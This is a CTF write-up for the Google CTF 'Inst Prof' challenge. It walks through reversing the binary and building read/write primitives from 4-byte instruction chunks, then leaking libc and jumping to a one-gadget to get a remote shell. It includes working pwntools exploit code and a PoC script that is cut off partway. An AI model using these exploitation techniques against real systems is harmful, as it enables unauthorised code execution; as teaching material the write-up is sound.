TL;DR We managed to write arbitrary values into registers/memory and spawned a shell using a single magic gadget from libc. 👍🏻

This write-up is aimed at beginners and tries to explain thoroughly the steps we followed to solve the challenge. We assume the reader knows the very basics of C programming, buffer overflows, and 32-bit vs 64-bit assembly. Our proofs of concept use the fabulous pwntools, a framework for writing and debugging exploits with ease.

1. First steps

Let’s start. For this challenge, we were given a 64-bit ELF named inst_prof

$ file ./inst_prof
./inst_prof: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=61e50b540c3c8e7bcef3cb73f3ad2a10c2589089, not stripped

which, luckily, is not stripped: symbol information (like the names of functions and global variables) was not removed from the binary. Use nm

$ nm ./inst_prof
[...]
0000000000000860 T main
0000000000000a20 T make_page_executable
                 U mmap@@GLIBC_2.2.5
                 U mprotect@@GLIBC_2.2.5
                 U munmap@@GLIBC_2.2.5
0000000000000a50 T read_byte
                 U read@@GLIBC_2.2.5
0000000000000ab0 T read_inst
0000000000000a80 T read_n
[...]

to list all symbols in an object file. Before analyzing the binary, it’s always a good idea to check which security features it uses. This can be easily done with checksec (from pwntools)

$ pwn checksec ./inst_prof
[*] '/home/ubuntu/inst_prof'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

which reports that the binary is both NX and PIE enabled. What does this mean? The NX bit is a feature used to mark certain areas of memory (e.g. the stack) as non-executable, preventing code inserted into them from being executed: for example, if one manages to put shellcode on the stack and jump into it by overwriting a return address, the program will abruptly terminate because of a segmentation fault. In addition, since the binary is position-independent, its runtime location in virtual memory is randomized (assuming ASLR is enabled on the machine), preventing an attacker who is able to control the instruction pointer from reliably jumping to useful memory locations like the .text section or the GOT.

To get an initial idea of what the program does, we tried to play a bit with it:

$ ./inst_prof
initializing prof...ready
1234
Segmentation fault (core dumped)

Wait, what?

$ ./inst_prof
initializing prof...ready
asdf
Illegal instruction (core dumped)

Oh well… time to fire up our disassemblers!

2. From assembly back to C

In this section we discuss how the program works, presenting C code equivalent to its disassembly. Recall that the binary is 64-bit and uses the System V AMD64 calling convention, in which the first arguments are passed in registers rdi, rsi, rdx, rcx (then r8 and r9). The function main() is equivalent to the C code

int main(int argc, const char *argv[], const char *envp[]) {
    if (write(1, "initializing prof...", 0x14) == 0x14) {
        sleep(5);
        alarm(0x1E);
        if (write(1, "ready\n", 6) == 6) {
            while (1) {
                do_test();
            }
        }
    }
    exit(0);
}

which makes clear that this function just repeatedly calls do_test() until SIGALRM is raised (after 0x1E = 30 seconds). The function do_test() is equivalent to the C code

void do_test() {
    char *page_addr = alloc_page();
    memcpy(page_addr, template, sizeof(template));

    read_inst(page_addr + 5);
    make_page_executable(page_addr);

    uint64_t start_time = rdtsc();
    ((void (*)(void))page_addr)();
    uint64_t elapsed_time = rdtsc() - start_time;

    if (write(1, &elapsed_time, 8) != 8) {
        exit(0);
    }
    free_page(page_addr);
}

which uses the global variable template defined as

/*
   0:   b9 00 10 00 00          mov    ecx,0x1000
   5:   90                      nop
   6:   90                      nop
   7:   90                      nop
   8:   90                      nop
   9:   83 e9 01                sub    ecx,0x1
   c:   75 f7                   jne    0x5
   e:   c3                      ret
*/
char template[] = { 0xB9, 0x00, 0x10, 0x00, 0x00, 0x90, 0x90, 0x90, 0x90, 0x83, 0xE9, 0x01, 0x75, 0xF7, 0xC3 };
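To make the role of the four NOP placeholders concrete, here is a minimal Python 3 sketch (not part of the original program) that models what the page contains once do_test() has copied template and read_inst() has stored the user bytes at offset 5. The names TEMPLATE, USER_OFFSET and patch_template are ours, chosen only for illustration.

```python
# Bytes of the `template` array from the C listing above.
TEMPLATE = bytes([
    0xB9, 0x00, 0x10, 0x00, 0x00,  # mov ecx, 0x1000
    0x90, 0x90, 0x90, 0x90,        # four NOP placeholders
    0x83, 0xE9, 0x01,              # sub ecx, 1
    0x75, 0xF7,                    # jne back to offset 5
    0xC3,                          # ret
])

USER_OFFSET = 5  # do_test() calls read_inst(page_addr + 5)


def patch_template(user_bytes):
    """Return the page contents after 4 user bytes replace the NOPs."""
    if len(user_bytes) != 4:
        raise ValueError("read_inst() always reads exactly 4 bytes")
    page = bytearray(TEMPLATE)
    page[USER_OFFSET:USER_OFFSET + 4] = user_bytes
    return bytes(page)


# The input "1234" from the first test run ends up inside the loop body.
patched = patch_template(b"1234")
print(patched.hex())
```

Typing ASCII text therefore means asking the CPU to execute the character codes 0x31 0x32 0x33 0x34 as machine code, which is consistent with the crashes seen earlier.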

The remaining functions are quite straightforward to reverse and can be summarized as:

Function                                    Description
void *alloc_page()                          maps a new page into memory with mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) (we used a little script to recover the names of the header file constants)
void read_inst(void *addr)                  calls read_n(addr, 4)
void read_n(void *addr, int n)              repeatedly calls read_byte() to read n bytes into addr
char read_byte()                            reads and returns a character from the user via stdin
void make_page_executable(void *page_addr)  changes the access protections of a page with mprotect(page_addr, 0x1000, PROT_READ|PROT_EXEC)
void free_page(void *page_addr)             unmaps a page using munmap(page_addr, 0x1000)

Remember the description of the challenge? It says “Please help test our new compiler micro-service”. This program just executes in a loop the following steps for 30 seconds:

  • Allocate a zero-filled memory page of 0x1000 bytes
  • Copy to the allocated area the predefined machine instructions contained in template
  • Read four bytes from the user and place them in the memory page, substituting the four NOP placeholders
  • Remove the write permissions from the page and make it executable
  • Execute the code in the page and print the elapsed number of CPU cycles

The challenge and binary name “Inst Prof” is very likely the short form of “Instruction Profiler”. In a nutshell, the program happily executes user instructions provided that they fit in four bytes. What can we do in such a small space?!

3. Some Aha! moments

It turns out we can do quite a lot, as long as we keep in mind that the injected instructions are executed 0x1000 times in a loop. In fact, instructions like sub r14, r15 have cumulative effects when repeated multiple times and should be followed by ret to execute them only once. Consequently, instructions like shl r14, 32 that are already four bytes long can’t be used since there’s no space left to return immediately after. You can use the asm utility from pwntools to easily assemble code on the command line:

$ asm -c amd64 'shl r14, 32'
49c1e620
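The four-byte budget can be sketched without pwntools. The Python 3 snippet below pads an already assembled instruction with ret (0xc3) and reports whether the instruction leaves room for it. The helper names are ours, and the 3-byte encoding used for shl r14, 1 is an assumption about what the assembler emits; the 4-byte encoding of shl r14, 32 is the one printed by asm above.

```python
RET = b"\xc3"  # x86-64 encoding of `ret`


def pad_with_ret(bytecode):
    """Pad an assembled instruction to the 4 bytes read_inst() expects."""
    if len(bytecode) > 4:
        raise ValueError("does not fit in the 4-byte slot")
    return bytecode.ljust(4, RET)


def runs_only_once(bytecode):
    """True if at least one `ret` fits after the instruction."""
    return len(bytecode) < 4


SHL_R14_1 = bytes.fromhex("49d1e6")     # shl r14, 1 (assumed encoding)
SHL_R14_32 = bytes.fromhex("49c1e620")  # shl r14, 32 (asm output above)

for name, code in (("shl r14, 1", SHL_R14_1), ("shl r14, 32", SHL_R14_32)):
    print(name, pad_with_ret(code).hex(), runs_only_once(code))
```

This is why a 32-bit shift has to be emulated with 32 separate one-bit shifts, each followed by ret.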

The following subsections present what we have found out after some time spent debugging the program.

How to: keep a state between executions

Registers r13, r14 and r15 are left unchanged between executions of user instructions and can be used to store data. We call these the “state registers”.

How to: leak the value of any register

Register r12 is used to store the value of the start_time variable, that is the return value of a call to rdtsc(). After the execution of user instructions, the program computes elapsed_time = rdtsc() - start_time = rdtsc() - r12 and prints the result back to the user via stdout. If, through user instructions, we subtract any value x from r12, the program will print to us elapsed_time + x, and since elapsed_time is usually small (at most 2 bytes), we will get a good approximation of x (the four most significant bytes should be correct). To leak the remaining four bytes of x, we can shift it left by 32 bits and leak the value again.

def get_reg(reg):
    instructions = []

    # leak the most significant 32 bits
    instructions.append('sub r12, {reg:}; ret')

    # leak the least significant 32 bits
    for _ in range(32):
        instructions.append('shl {reg:}, 1; ret')
    instructions.append('sub r12, {reg:}; ret')

    output = execute([inst.format(reg=reg) for inst in instructions])
    hi_bits = output[0]  & 0xffffffff00000000
    lo_bits = output[33] & 0xffffffff00000000
    return hi_bits | (lo_bits >> 32)
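The arithmetic behind get_reg() can be checked offline. The following sketch models the two values printed by the program (elapsed_time + x, then elapsed_time + (x << 32), both modulo 2^64) and recombines them exactly as get_reg() does. The elapsed values are made-up small numbers, and the function names are ours.

```python
MASK64 = (1 << 64) - 1
HI32 = 0xffffffff00000000


def leaked_output(reg_value, elapsed):
    """Value printed after `sub r12, reg`: elapsed + reg (mod 2**64)."""
    return (elapsed + reg_value) & MASK64


def reconstruct(reg_value, elapsed_first, elapsed_second):
    """Recombine the two leaks the same way get_reg() does."""
    out_hi = leaked_output(reg_value, elapsed_first)
    shifted = (reg_value << 32) & MASK64  # effect of 32 x `shl reg, 1`
    out_lo = leaked_output(shifted, elapsed_second)
    return (out_hi & HI32) | ((out_lo & HI32) >> 32)


secret = 0x7ffff7a32f45  # example 64-bit value to leak
print(hex(reconstruct(secret, 0x3a1, 0x2c7)))
```

One caveat of this scheme: if adding elapsed_time to the low 32 bits of x carries into bit 32, the upper half comes out one too large. For example, reconstruct(0x1ffffffff, 1, 1) does not return the original value. With small timings this is rare, but a robust script could leak twice and compare.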

How to: set state registers to arbitrary values

We can use instructions like mov r14b, <byte> to set the least significant byte of r14, and execute shl r14, 1 multiple times to move the byte into the desired position.

def set_reg(reg, imm, recv=True):
    imm_bytes = []
    while imm:
        imm_bytes.insert(0, imm & 0xff)
        imm >>= 8

    instructions = list()
    instructions.append('xor {reg:}, {reg:}; ret')

    for b in imm_bytes:
        instructions.extend(['shl {reg:}, 1; ret']*8)
        instructions.append('mov {{reg:}}b, 0x{b:02x}; ret'.format(b=b))

    execute([inst.format(reg=reg) for inst in instructions], recv)
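To see why this sequence produces the requested value, here is a small pure-Python model of the register as set_reg() drives it: one xor, then for every byte eight one-bit shifts followed by a write to the low byte. It also counts how many 4-byte chunks are sent. This is only a simulation under our own naming (simulate_set_reg); it does not talk to the binary.

```python
MASK64 = (1 << 64) - 1


def simulate_set_reg(imm):
    """Return (final register value, number of 4-byte chunks sent)."""
    if imm < 0:
        raise ValueError("negative values must be masked to 64 bits first")

    # Same big-endian byte split as set_reg().
    imm_bytes = []
    while imm:
        imm_bytes.insert(0, imm & 0xff)
        imm >>= 8

    reg = 0   # xor reg, reg
    sent = 1
    for b in imm_bytes:
        for _ in range(8):
            reg = (reg << 1) & MASK64  # shl reg, 1
        reg = (reg & ~0xff) | b        # mov <reg>b, b
        sent += 9
    return reg, sent


print(simulate_set_reg(0x40))
print(simulate_set_reg(0x21f45))
```

Each byte of the immediate costs nine round trips through the template, so small constants are cheap and a full 8-byte value needs 73 chunks.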

How to: read from/write into memory

Since we are able to set r14 and r15 to arbitrary values, we can use:

  • instructions like mov r14, [r15] and mov r14, [rsp+r15] paired with get_reg() to leak any memory location
  • instructions like mov [r15], r14 and mov [rsp+r15], r14 to modify any memory location
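A detail worth spelling out: instructions such as mov r14, [rsp+r15] should assemble to a full four bytes, leaving no room for ret, so they run 0x1000 times. That is harmless because a plain load or store gives the same result however often it is repeated, unlike sub or add. The sketch below models both cases in Python; the register and memory values are illustrative and the helper names are ours.

```python
MASK64 = (1 << 64) - 1
LOOP_COUNT = 0x1000  # initial value of ecx in the template


def mov_r14_from_stack(regs, memory):
    """Model of `mov r14, [rsp+r15]` (no room left for `ret`)."""
    regs["r14"] = memory[regs["rsp"] + regs["r15"]]


def sub_r14_r15(regs, memory):
    """Model of `sub r14, r15` (short enough to be followed by `ret`)."""
    regs["r14"] = (regs["r14"] - regs["r15"]) & MASK64


def run_in_template(instruction, regs, memory, followed_by_ret):
    """Apply the instruction once if `ret` follows it, else 0x1000 times."""
    regs = dict(regs)  # work on a copy so callers can compare results
    for _ in range(1 if followed_by_ret else LOOP_COUNT):
        instruction(regs, memory)
    return regs


rsp = 0x7fffffffe588                     # illustrative stack pointer
memory = {rsp + 0x40: 0x7ffff7a32f45}    # illustrative stack slot
regs = {"rsp": rsp, "r14": 0, "r15": 0x40}

loaded = run_in_template(mov_r14_from_stack, regs, memory, False)
once = run_in_template(sub_r14_r15, loaded, memory, True)
looped = run_in_template(sub_r14_r15, loaded, memory, False)
print(hex(loaded["r14"]), hex(once["r14"]), hex(looped["r14"]))
```

The load yields the stored value even after 0x1000 iterations, while the subtraction without ret is off by 0x1000 times the operand.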

4. An educated guess

How can we use the read and write primitives we just found? There are multiple possibilities to explore. Probably, one could try to write shellcode in any writable section of the binary (e.g. in a page obtained using alloc_page() or on the stack) and reuse the code of make_page_executable() before jumping to it. We decided to spend some minutes to see if we were able to return-to-libc and just reuse existing code. To perform any kind of ret2libc, the attacker usually needs to know both which version of libc is used by the target program and where this library is loaded in memory. The challenge did not provide any information about the libc used by the binary at inst-prof.ctfcompetition.com:1337, but the given executable was compiled with the GCC packaged for Ubuntu 14.04

$ strings ./inst_prof | grep GCC
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4

and the libc supplied to solve another pwnable challenge (β€œAssignment”) was also from Ubuntu 14.04.

$ ./libc-2.19.so
GNU C Library (Ubuntu EGLIBC 2.19-0ubuntu6.11) stable release version 2.19, by Roland McGrath et al.
Copyright (C) 2014 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
PARTICULAR PURPOSE.
Compiled by GNU CC version 4.8.4.
[...]

We decided that this guess was worth a shot, since it takes very little time to check it. While one of us started coding the first part of the exploit, the other used vagrant to start a virtual machine with Ubuntu 14.04, which contained a slightly newer libc (Ubuntu EGLIBC 2.19-0ubuntu6.13) than the one provided. Assuming this setup was similar enough to the machines which hosted the challenge, we just needed to leak from the program memory an address which pointed to any location of libc. We quickly debugged inst_prof with GDB and pwndbg to inspect the state of the stack just before the four bytes of user instructions (NOPs in this case) were executed:

pwndbg> nearpc 3
 ► 0x7ffff7ff7000    mov    ecx, 0x1000
   0x7ffff7ff7005    nop
   0x7ffff7ff7006    nop
   0x7ffff7ff7007    nop
   0x7ffff7ff7008    nop
   0x7ffff7ff7009    sub    ecx, 1
   0x7ffff7ff700c    jne    0x7ffff7ff7005
pwndbg> stack 10
00:0000│ rsp  0x7fffffffe588 —▸ 0x555555554b18 (do_test+88) ◂— rdtsc
01:0008│      0x7fffffffe590 ◂— 0x1
02:0010│      0x7fffffffe598 —▸ 0x7ffff7dd4e80 (initial) ◂— 0x0
03:0018│      0x7fffffffe5a0 ◂— 0x0
04:0020│      0x7fffffffe5a8 —▸ 0x5555555548c9 (_start) ◂— xor    ebp, ebp
05:0028│ rbp  0x7fffffffe5b0 —▸ 0x7fffffffe5c0 ◂— 0x0
06:0030│      0x7fffffffe5b8 —▸ 0x5555555548c7 (main+103) ◂— jmp    0x5555555548c0
07:0038│      0x7fffffffe5c0 ◂— 0x0
08:0040│      0x7fffffffe5c8 —▸ 0x7ffff7a32f45 (__libc_start_main+245) ◂— mov    edi, eax
09:0048│      0x7fffffffe5d0 ◂— 0x0

Looking closely, we can see that [rsp+0x40] contains the libc address of __libc_start_main+245. Using simple arithmetic

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    0x555555554000     0x555555555000 r-xp     1000 0      /home/ubuntu/vbox/prof/inst_prof_patched
    0x555555755000     0x555555756000 r--p     1000 1000   /home/ubuntu/vbox/prof/inst_prof_patched
    0x555555756000     0x555555757000 rw-p     1000 2000   /home/ubuntu/vbox/prof/inst_prof_patched
    0x7ffff7a11000     0x7ffff7bcf000 r-xp   1be000 0      /lib/x86_64-linux-gnu/libc-2.19.so
    0x7ffff7bcf000     0x7ffff7dcf000 ---p   200000 1be000 /lib/x86_64-linux-gnu/libc-2.19.so
    0x7ffff7dcf000     0x7ffff7dd3000 r--p     4000 1be000 /lib/x86_64-linux-gnu/libc-2.19.so
    0x7ffff7dd3000     0x7ffff7dd5000 rw-p     2000 1c2000 /lib/x86_64-linux-gnu/libc-2.19.so
[...]
$ python -c 'print hex(0x7ffff7a32f45-0x7ffff7a11000)'
0x21f45

we can compute the base address of libc by subtracting 0x21f45 from [rsp+0x40]. Voilà!
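The same subtraction as a reusable helper, with one cheap sanity check added: since shared libraries are mapped at page-aligned addresses, a correct base must end in three zero hex digits. The function name is ours, and the offset 0x21f45 only holds for the libc of our local virtual machine.

```python
PAGE_MASK = 0xfff
LIBC_START_MAIN_245_OFFSET = 0x21f45  # valid for our local libc only


def libc_base_from_leak(leaked_return_address):
    """Turn the leaked __libc_start_main+245 address into the libc base."""
    base = leaked_return_address - LIBC_START_MAIN_245_OFFSET
    if base & PAGE_MASK:
        # A misaligned base usually means a different libc build.
        raise ValueError("base {:#x} is not page-aligned".format(base))
    return base


print(hex(libc_base_from_leak(0x7ffff7a32f45)))
```

If the remote libc differed from the local one, the alignment check would most likely fail and flag the wrong guess early.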

5. Magical gadgets

Once an attacker is able to find the base address of libc, the easiest way to spawn a shell is to use any of the available – wait for it – one-gadget RCEs. These gadgets are just sequences of instructions from libc that execute execve("/bin/sh", NULL, NULL) by themselves, provided that some constraints are met. What sorcery is this? They are just part of the implementation of system(). There exist many tools in the wild to find them, for example one_gadget:

$ one_gadget ./libc.so.6
0x4647c execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xc56e3 execve("/bin/sh", rsi, r12)
constraints:
  [rsi] == NULL || rsi == NULL
  [r12] == NULL || r12 == NULL

0xc5732 execve("/bin/sh", [rbp-0x48], r12)
constraints:
  [[rbp-0x48]] == NULL || [rbp-0x48] == NULL
  [r12] == NULL || r12 == NULL

0xe81d8 execve("/bin/sh", rsi, [rbp-0xf0])
constraints:
  [rsi] == NULL || rsi == NULL
  [[rbp-0xf0]] == NULL || [rbp-0xf0] == NULL

0xe8fd5 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xe9f2d execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

From the output above we can see that the tool finds six magic gadgets in the provided libc. For instance, the first one can be found at offset 0x4647c from libc base and will execute /bin/sh only if [rsp+0x30] is zero. Let’s just consider the gadgets with the simplest constraints ([rsp+0x30] == NULL, [rsp+0x50] == NULL and [rsp+0x70] == NULL) and check if they are satisfied:

pwndbg> nearpc 3
 ► 0x7ffff7ff7000    mov    ecx, 0x1000
   0x7ffff7ff7005    nop
   0x7ffff7ff7006    nop
   0x7ffff7ff7007    nop
   0x7ffff7ff7008    nop
   0x7ffff7ff7009    sub    ecx, 1
   0x7ffff7ff700c    jne    0x7ffff7ff7005
pwndbg> stack 20
00:0000│ rsp  0x7fffffffe588 —▸ 0x555555554b18 (do_test+88) ◂— rdtsc
01:0008│      0x7fffffffe590 ◂— 0x1
02:0010│      0x7fffffffe598 —▸ 0x7ffff7dd4e80 (initial) ◂— 0x0
03:0018│      0x7fffffffe5a0 ◂— 0x0
04:0020│      0x7fffffffe5a8 —▸ 0x5555555548c9 (_start) ◂— xor    ebp, ebp
05:0028│ rbp  0x7fffffffe5b0 —▸ 0x7fffffffe5c0 ◂— 0x0
06:0030│      0x7fffffffe5b8 —▸ 0x5555555548c7 (main+103) ◂— jmp    0x5555555548c0
07:0038│      0x7fffffffe5c0 ◂— 0x0
08:0040│      0x7fffffffe5c8 —▸ 0x7ffff7a32f45 (__libc_start_main+245) ◂— mov    edi, eax
09:0048│      0x7fffffffe5d0 ◂— 0x0
0a:0050│      0x7fffffffe5d8 —▸ 0x7fffffffe6a8 —▸ 0x7fffffffe8b1 ◂— 0x705f74736e692f2e ('./inst_p')
0b:0058│      0x7fffffffe5e0 ◂— 0x100000000
0c:0060│      0x7fffffffe5e8 —▸ 0x555555554860 (main) ◂— push   rbp
0d:0068│      0x7fffffffe5f0 ◂— 0x0
0e:0070│      0x7fffffffe5f8 ◂— 0x7f6c40ce365df5a7
0f:0078│      0x7fffffffe600 —▸ 0x5555555548c9 (_start) ◂— xor    ebp, ebp
10:0080│      0x7fffffffe608 —▸ 0x7fffffffe6a0 ◂— 0x1
11:0088│      0x7fffffffe610 ◂— 0x0
... ↓
13:0098│      0x7fffffffe620 ◂— 0x8093bf31fdfdf5a7

Uhm. None of [rsp+0x30], [rsp+0x50] and [rsp+0x70] is zero… but this is not a problem, since we discovered a way to write arbitrary values into memory. Better still, considering the penultimate gadget and noticing that [rsp+0x50-8] is already NULL, we can just push any value onto the stack before jumping to that gadget (a call instruction does exactly that by pushing its return address), so that rsp is decreased by 8 and [rsp+0x50] becomes zero.
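The effect of that extra push can be checked against the stack dump with a few lines of Python. The dictionary below copies the first fifteen stack slots from the dump (keyed by offset from rsp), and slot_after_push() models the 8-byte shift caused by one push. It is only a model of our local debugging session, not of the remote stack, and the helper name is ours.

```python
# Stack contents from the pwndbg dump, keyed by offset from rsp.
STACK = {
    0x00: 0x555555554b18, 0x08: 0x1,            0x10: 0x7ffff7dd4e80,
    0x18: 0x0,            0x20: 0x5555555548c9, 0x28: 0x7fffffffe5c0,
    0x30: 0x5555555548c7, 0x38: 0x0,            0x40: 0x7ffff7a32f45,
    0x48: 0x0,            0x50: 0x7fffffffe6a8, 0x58: 0x100000000,
    0x60: 0x555555554860, 0x68: 0x0,            0x70: 0x7f6c40ce365df5a7,
}


def slot_after_push(offset):
    """Value at [rsp+offset] after one 8-byte push (rsp decreases by 8)."""
    return STACK[offset - 8]


for constraint in (0x30, 0x50, 0x70):
    before = STACK[constraint] == 0
    after = slot_after_push(constraint) == 0
    print(hex(constraint), "before:", before, "after push:", after)
```

In this model the [rsp+0x50] constraint goes from unsatisfied to satisfied after a single push. The [rsp+0x70] slot also reads zero after the push, though the PoC below only relies on the gadget at 0xe8fd5.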

6. Summing it all up

The full return-to-guessed-libc exploit finally takes shape:

  1. Set r15 to 0x40
  2. Execute mov r14, [rsp+r15], setting r14 to __libc_start_main+245
  3. Set r15 to 0x21f45 and execute sub r14, r15, setting r14 to the base address of libc
  4. Set r15 to 0xe8fd5 and execute add r14, r15, setting r14 to the address of the magic gadget
  5. Execute call r14 to jump to the gadget and satisfy its single constraint

Note that steps 3. and 4. can be merged into a single arithmetic operation. In our PoC, this translates simply to:

conn = remote('inst-prof.ctfcompetition.com', 1337)
conn.recvuntil('initializing prof...ready\n')

# find the address of __libc_start_main+245
set_reg('r15', 0x40)
execute('mov r14, [rsp+r15]')

# calculate the address of the chosen one-gadget and jump to it
libc_start_main_245_offset = 0x21f45
onegadget_offset = 0xe8fd5
set_reg('r15', -libc_start_main_245_offset + onegadget_offset)
execute('add r14, r15')
execute('call r14', recv=False)

conn.interactive()
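As a quick offline check of the merged arithmetic, the snippet below confirms that adding the single delta to the leaked address gives the same result as subtracting one offset and adding the other. The leak value is the one from our local debugging session, and to_u64 is a hypothetical helper that is not part of the PoC.

```python
MASK64 = (1 << 64) - 1

LIBC_START_MAIN_245_OFFSET = 0x21f45
ONEGADGET_OFFSET = 0xe8fd5


def to_u64(value):
    """Two's-complement view of a Python int, as a 64-bit register sees it."""
    return value & MASK64


delta = -LIBC_START_MAIN_245_OFFSET + ONEGADGET_OFFSET

leak = 0x7ffff7a32f45  # __libc_start_main+245 in our local session
two_steps = (leak - LIBC_START_MAIN_245_OFFSET) + ONEGADGET_OFFSET
one_step = to_u64(leak + delta)

print(hex(delta), hex(one_step))
```

Here the delta happens to be positive. With a gadget located below the leaked address it would be negative, and set_reg() as written would never terminate, because in Python a negative integer shifted right never reaches zero; masking it with to_u64() first avoids that.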

Let’s hope it works…

$ python2 ./poc.py
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
[*] Switching to interactive mode
$ id
uid=1337(user) gid=1337(user) groups=1337(user)

Oh my! First try! 🚀

$ ls
flag.txt
inst_prof
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}

7. Closing remarks

Solving “Inst Prof” took us:

  • ~20 minutes to reverse the binary
  • > 2 hours to find how to read from/write to arbitrary locations and fix a stupid bug in our script
  • < 5 minutes to test the program in Ubuntu 14.04, find a libc address, compute the correct offsets and spawn a shell

Of course, one can ask: “what if you were wrong and your local setup didn’t match the remote?” The challenge can be solved without any guessing by:

  • leaking from the stack an address pointing to the binary (e.g. _start at [rsp+0x20])
    pwndbg> stack 5
    00:0000│ rsp  0x7fffffffe588 —▸ 0x555555554b18 (do_test+88) ◂— rdtsc
    01:0008│      0x7fffffffe590 ◂— 0x1
    02:0010│      0x7fffffffe598 —▸ 0x7ffff7dd4e80 (initial) ◂— 0x0
    03:0018│      0x7fffffffe5a0 ◂— 0x0
    04:0020│      0x7fffffffe5a8 —▸ 0x5555555548c9 (_start) ◂— xor    ebp, ebp
    
  • computing the base address of the binary by subtracting the appropriate offset from the leaked address
    $ nm ./inst_prof | grep _start
    [...]
    00000000000008c9 T _start
    
  • computing the address of the .got.plt section by adding the appropriate offset to the base address
    $ readelf -S ./inst_prof | grep got.plt
    [23] .got.plt          PROGBITS         0000000000202000  00002000
    
  • leaking from the GOT the addresses of any two libc functions, for example write() and mmap()
    pwndbg> telescope 0x555555554000+0x202000
    00:0000│   0x555555756000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x201e08
    01:0008│   0x555555756008 (_GLOBAL_OFFSET_TABLE_+8) —▸ 0x7ffff7ffe1c8 —▸ 0x555555554000 (main) ◂— jg     0x555555554047
    02:0010│   0x555555756010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0x7ffff7df0670 (_dl_runtime_resolve) ◂— sub    rsp, 0x38
    03:0018│   0x555555756018 (write@got.plt) —▸ 0x7ffff7b00380 (write) ◂— cmp    dword ptr [rip + 0x2d8ced], 0
    04:0020│   0x555555756020 (mmap@got.plt) —▸ 0x7ffff7b094f0 (mmap64) ◂— mov    r10, rcx
    05:0028│   0x555555756028 (alarm@got.plt) —▸ 0x5555555547d6 (alarm@plt+6) ◂— push   2
    06:0030│   0x555555756030 (read@got.plt) —▸ 0x7ffff7b00320 (read) ◂— cmp    dword ptr [rip + 0x2d8d4d], 0
    07:0038│   0x555555756038 (__libc_start_main@got.plt) —▸ 0x7ffff7a32e50 (__libc_start_main) ◂— push   r14
    
    $ ./poc.py --leak
    [+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
    write_addr 0x7fb680670f70
    mmap_addr 0x7fb68067a0e0
    [*] Closed connection to inst-prof.ctfcompetition.com port 1337
    
  • using libcdb.com or libc-database to identify the libc of the remote server from the leaked addresses
    /opt/libc-database $ ./find write 0x7fb680670f70 mmap 0x7fb68067a0e0
    archive-eglibc (id libc6_2.19-0ubuntu6.11_amd64)
    
  • computing the base address of libc and jumping to one-gadgets as we did before (constraints are no problem since we are able to write into memory)
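The address arithmetic of the steps above can be sketched as follows. The offsets come from the nm, readelf and telescope outputs shown in the list; the function names are ours. The second helper illustrates why a lookup by leaked address can work at all: libraries are mapped at page-aligned addresses, so the low 12 bits of a function address survive ASLR and act as a fingerprint of the libc build.

```python
START_OFFSET = 0x8c9       # _start, from nm
GOTPLT_OFFSET = 0x202000   # .got.plt, from readelf
WRITE_SLOT = 0x18          # write@got.plt, from telescope
MMAP_SLOT = 0x20           # mmap@got.plt, from telescope


def got_slots(start_leak):
    """Return (binary base, &write@got.plt, &mmap@got.plt)."""
    base = start_leak - START_OFFSET
    gotplt = base + GOTPLT_OFFSET
    return base, gotplt + WRITE_SLOT, gotplt + MMAP_SLOT


def page_offset(address):
    """Low 12 bits of an address, which ASLR does not change."""
    return address & 0xfff


base, write_slot, mmap_slot = got_slots(0x5555555548c9)
print(hex(base), hex(write_slot), hex(mmap_slot))

# Addresses leaked from the remote server by `./poc.py --leak`.
print(hex(page_offset(0x7fb680670f70)), hex(page_offset(0x7fb68067a0e0)))
```

The remote low bits (0xf70 and 0x0e0) differ from those of write and mmap in our local session (0x380 and 0x4f0), which fits with the remote server running a different libc package than our virtual machine.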

But all of this would have taken five more minutes. 😄

Thanks to Google for the CTF and this fun little challenge, which gave us the opportunity to publish this write-up. See you in future competitions!

PoC

#!/usr/bin/env python2
# -*- coding: utf8 -*-
import argparse

from pwn import *
context(arch='amd64', os='linux')

# by Francesco Cagnin aka integeruser and Marco Gasparini aka xire
# of c00kies@venice


def assemble(code):
    bytecode = asm(code)
    assert len(bytecode) <= 4, '"{}" assembles to more than 4 bytes'.format(code)
    return bytecode.ljust(4, asm('ret'))

def execute(instructions, recv=True):
    if isinstance(instructions, str):
        instructions = [instructions]

    conn.send(''.join(assemble(inst) for inst in instructions))
    if recv:
        return [unpack(conn.recvn(8)) for _ in range(len(instructions))]

################################################################################

def get_reg(reg):
    instructions = []

    # leak the most significant 32 bits
    instructions.append('sub r12, {reg:}; ret')

    # leak the least significant 32 bits
    for _ in range(32):
        instructions.append('shl {reg:}, 1; ret')
    instructions.append('sub r12, {reg:}; ret')

    output = execute([inst.format(reg=reg) for inst in instructions])
    hi_bits = output[0]  & 0xffffffff00000000
    lo_bits = output[33] & 0xffffffff00000000
    return hi_bits | (lo_bits >> 32)

def set_reg(reg, imm, recv=True):
    imm_bytes = []
    while imm:
        imm_bytes.insert(0, imm & 0xff)
        imm >>= 8

    instructions = list()
    instructions.append('xor {reg:}, {reg:}; ret')

    for b in imm_bytes:
        instructions.extend(['shl {reg:}, 1; ret']*8)
        instructions.append('mov {{reg:}}b, 0x{b:02x}; ret'.format(b=b))

    execute([inst.format(reg=reg) for inst in instructions], recv)

################################################################################

def leak_write_mmap_addr():
    global conn
    conn = remote('inst-prof.ctfcompetition.com', 1337)
    conn.recvuntil('initializing prof...ready\n')

    # find the address of _start
    set_reg('r15', 0x20)
    execute('mov r14, [rsp+r15]')

    # calculate the address of the GOT table
    start_offset = 0x8c9
    gotplt_offset = 0x202000
    set_reg('r15', -start_offset + gotplt_offset)
    execute('add r14, r15')

